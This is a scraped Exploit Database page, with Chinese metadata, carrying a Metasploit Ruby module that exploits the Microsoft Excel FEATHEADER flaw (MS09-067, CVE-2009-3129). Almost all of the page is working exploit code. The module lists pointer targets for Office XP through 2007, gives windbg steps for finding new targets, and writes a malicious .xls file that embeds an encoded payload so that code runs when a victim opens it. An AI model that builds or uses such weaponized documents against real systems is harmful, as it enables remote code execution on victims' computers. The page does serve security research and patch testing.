Microsoft Excel – Malformed FEATHEADER Record (MS09-067) (Metasploit)

Exploit Database
144 阅读

作者： Metasploit

日期： 2010-09-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/16625/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

# $Id: ms09_067_excel_featheader.rb 10477 2010-09-25 11:59:02Z mc $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

require 'rex/ole'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})

super(update_info(info,

'Name' => 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',

'Description'=> %q{

This module exploits a vulnerability in the handling of the FEATHEADER record

by Microsoft Excel. Revisions of Office XP and later prior to the release of the

MS09-067 bulletin are vulnerable.

When processing a FEATHEADER (Shared Feature) record, Microsoft used a data

structure from the file to calculate a pointer offset without doing proper

validation. Attacker supplied data is then used to calculate the location of an

object, and in turn a virtual function call. This results in arbitrary code

exection.

NOTE: On some versions of Office, the user will need to dismiss a warning dialog

prior to the payload executing.

'License'=> MSF_LICENSE,

'Author' =>

[

'Sean Larsson',# original discovery

'jduck'

'Version'=> '$Revision: 10477 $',

'References' =>

[

[ 'CVE','2009-3129' ],

[ 'OSVDB', '59860' ],

[ 'MSB', 'MS09-067' ],

[ 'BID', '36945' ],

[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-083/' ],

[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832' ]

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'DisablePayloadHandler' => 'true',

'Payload'=>

{

'Space' => 1024,

'BadChars'=> "\x00",

'DisableNops' => true # no need

'Platform' => 'win',

'Targets'=>

[

# To find new targets, generate the file using the debug target and execute

# the following in windbg:

# 0:000> s -b 0 L?-1 04 00 00 00 ee ff c0 da

# Use the largest number + 9 (should be in the 0x30xxxxxx range)

# Office v10.6501.6626, excel.exe v10.0.6501.0

[ 'Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English',

{ 'ObjPtr' => 0x307ddd10 }

# Office v10.6854.6845, excel.exe v10.0.6854.0

[ 'Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English',

{ 'ObjPtr' => 0x308082d0 }

# Office v11.5612.5606, excel.exe v11.0.5612.0

[ 'Microsoft Office 2003 SP0 English on Windows XP SP3 English',

{ 'ObjPtr' => 0x3085d430 }

# Office v12.0.6425.1000, excel.exe v12.0.6425.1000

[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',

{ 'ObjPtr' => 0x30f69018 }

# crash on a deref path to heaven.

[ 'Crash Target for Debugging',

{ 'ObjPtr' => 0xdac0ffee }

]

'DisclosureDate' => 'Nov 10 2009'))

register_options(

[

OptString.new('FILENAME', [ true, 'The file name.','msf.xls']),

], self.class)

end

def add_record(tag, data=nil)

ret = ""

ret << Rex::OLE::Util.pack16(tag)

data ||= ''

ret << Rex::OLE::Util.pack16(data.length)

ret << data

ret

end

def exploit

# build the Workbook stream

ptr1 = target['ObjPtr']

ptr2 = ptr1 + 4

ptr3 = ptr2 + 4

ptr4 = ptr3 + 4

bofdata = ""

bofdata << Rex::OLE::Util.pack16(0x0600)

bofdata << Rex::OLE::Util.pack16(0x0005)

bofdata << Rex::OLE::Util.pack16(0x1faa)

bofdata << Rex::OLE::Util.pack16(0x07cd)

bofdata << Rex::OLE::Util.pack32(0x000100c1)

bofdata << Rex::OLE::Util.pack32(0x00000406)

feathdr = ""

feathdr << Rex::OLE::Util.pack16(0x0867) # frt

feathdr << "\x00" * (10)

feathdr << Rex::OLE::Util.pack16(0x0004) # isf

feathdr << "\x01" # reserved

feathdr << Rex::OLE::Util.pack32(0x00000004) # cbHdrData

feathdr << [ptr1].pack('V')

feathdr << rand_text_alphanumeric(1) # alignment

feathdr << [ptr2].pack('V')

feathdr << [ptr3 - 0x28].pack('V')

feathdr << [ptr4].pack('V')

#feathdr << "\xcc"

feathdr << payload.encoded

content = ""

content << add_record(0x0809, bofdata)

content << add_record(0x0867, feathdr)

content << add_record(0x000a)

print_status("Creating Excel spreadsheet ...")

out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))

stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)

if (not stg)

raise RuntimeError, 'Unable to create output file'

end

stm = stg.create_stream("Workbook")

if (not stm)

raise RuntimeError, 'Unable to create workbook stream'

end

stm << content

stm.close

stg.close

print_status("Generated output file #{out}")

end